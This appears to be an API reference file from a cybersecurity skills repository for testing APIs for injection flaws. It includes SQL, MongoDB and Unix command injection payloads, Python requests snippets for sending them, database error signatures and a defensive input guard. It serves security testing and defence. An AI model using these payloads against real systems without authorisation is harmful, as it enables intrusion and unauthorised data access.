mukul975 c21af3347e Complete folder anatomy for all 649 cybersecurity skills + update LICENSE to Mahipal
- Add scripts/agent.py and references/api-reference.md to all remaining skills
- Update all 648 LICENSE files: copyright now reads 'Mahipal'
- Add implementing-security-monitoring-with-datadog (new skill with full anatomy)
- All 649 skills now have: SKILL.md, LICENSE, scripts/agent.py, references/api-reference.md
2026-03-11 00:22:12 +01:00

API Reference: API Injection Vulnerability Testing

OWASP API Security Top 10

| # | Risk | Description |
|---|------|-------------|
| API1 | Broken Object Level Auth | Accessing other users' data |
| API2 | Broken Authentication | Weak auth mechanisms |
| API3 | Broken Object Property Level Auth | Mass assignment |
| API8 | Security Misconfiguration | Injection via misconfig |
| API10 | Unsafe Consumption | Server-side injection |

SQL Injection Payloads

Error-Based

' OR '1'='1
' UNION SELECT NULL,NULL--
' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--

Time-Based Blind

' AND SLEEP(5)--
' AND pg_sleep(5)--
'; WAITFOR DELAY '0:0:5'--

NoSQL Injection Payloads

MongoDB Operator Injection

{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": {"$gt": ""}}
{"username": {"$regex": "admin.*"}}

Where Clause Injection

{"$where": "this.password == 'test'"}
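As an added example (not part of this reference), a server-side guard for a login endpoint that refuses the operator and `$where` payloads listed above before they reach the MongoDB driver; `reject_operators`, `build_login_filter` and `accepts_login_body` are names assumed here, and the samples are constructed.

```python
import re
from typing import Any

OPERATOR_KEY = re.compile(r"^\$")  # every MongoDB query operator starts with '$'

def reject_operators(value: Any, path: str = "body") -> None:
    """Walk a decoded JSON value and raise if any object key is an operator.

    Catches {"$ne": ""}, {"$gt": ""} and {"$regex": "admin.*"} nested under a
    field as well as a top-level {"$where": ...} clause.
    """
    if isinstance(value, dict):
        for key, inner in value.items():
            if not isinstance(key, str) or OPERATOR_KEY.match(key):
                raise ValueError(f"operator key {key!r} at {path}")
            reject_operators(inner, f"{path}.{key}")
    elif isinstance(value, list):
        for idx, inner in enumerate(value):
            reject_operators(inner, f"{path}[{idx}]")

def build_login_filter(body: Any) -> dict:
    """Build the MongoDB filter for a login lookup from an untrusted JSON body.

    Both credentials must be plain strings, so an object in either position
    is rejected before it can be spliced into the query. Only the username
    goes into the filter: the password is checked against the stored hash
    after the document is fetched, never compared inside the query.
    """
    if not isinstance(body, dict):
        raise ValueError("body must be a JSON object")
    reject_operators(body)
    username, password = body.get("username"), body.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError("username and password must be strings")
    return {"username": username}

def accepts_login_body(body: Any) -> bool:
    """True when the body passes validation, False when it is rejected."""
    try:
        build_login_filter(body)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    # Constructed samples: a normal login and the "$ne" payload listed above.
    for sample in ({"username": "alice", "password": "hunter2"},
                   {"username": {"$ne": ""}, "password": {"$ne": ""}}):
        print(accepts_login_body(sample), sample)
```

The same `reject_operators` walk can be applied to any endpoint that accepts structured filters, where the string-only rule of the login case is too strict.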

Command Injection Payloads

Unix

; id
| whoami
$(id)
`id`

Blind Command Injection

; sleep 5
| ping -c 5 127.0.0.1
$(sleep 5)

Python requests Library

GET with Parameters

```python
import requests

# url and payload are supplied by the caller; verify=False skips certificate
# validation for self-signed test endpoints.
resp = requests.get(url, params={"id": payload}, timeout=10, verify=False)
```

POST with JSON Body

```python
resp = requests.post(url, json={"field": payload}, timeout=10)
```

Response Analysis

| Attribute | Usage |
|-----------|-------|
| resp.status_code | HTTP status |
| resp.text | Response body |
| resp.elapsed.total_seconds() | Response time |
| len(resp.content) | Response size |

Error Signatures

SQL Databases

| Database | Error Pattern |
|----------|---------------|
| MySQL | You have an error in your SQL syntax |
| PostgreSQL | ERROR: syntax error at or near |
| MSSQL | Unclosed quotation mark |
| Oracle | ORA-01756 |
| SQLite | SQLITE_ERROR |

Burp Suite API

Initiate Scan

```http
POST https://burp:1337/v0.1/scan
Content-Type: application/json

{
  "urls": ["https://api.target.com/v1/users"],
  "scan_configurations": [{"name": "Audit checks - SQL injection"}]
}
```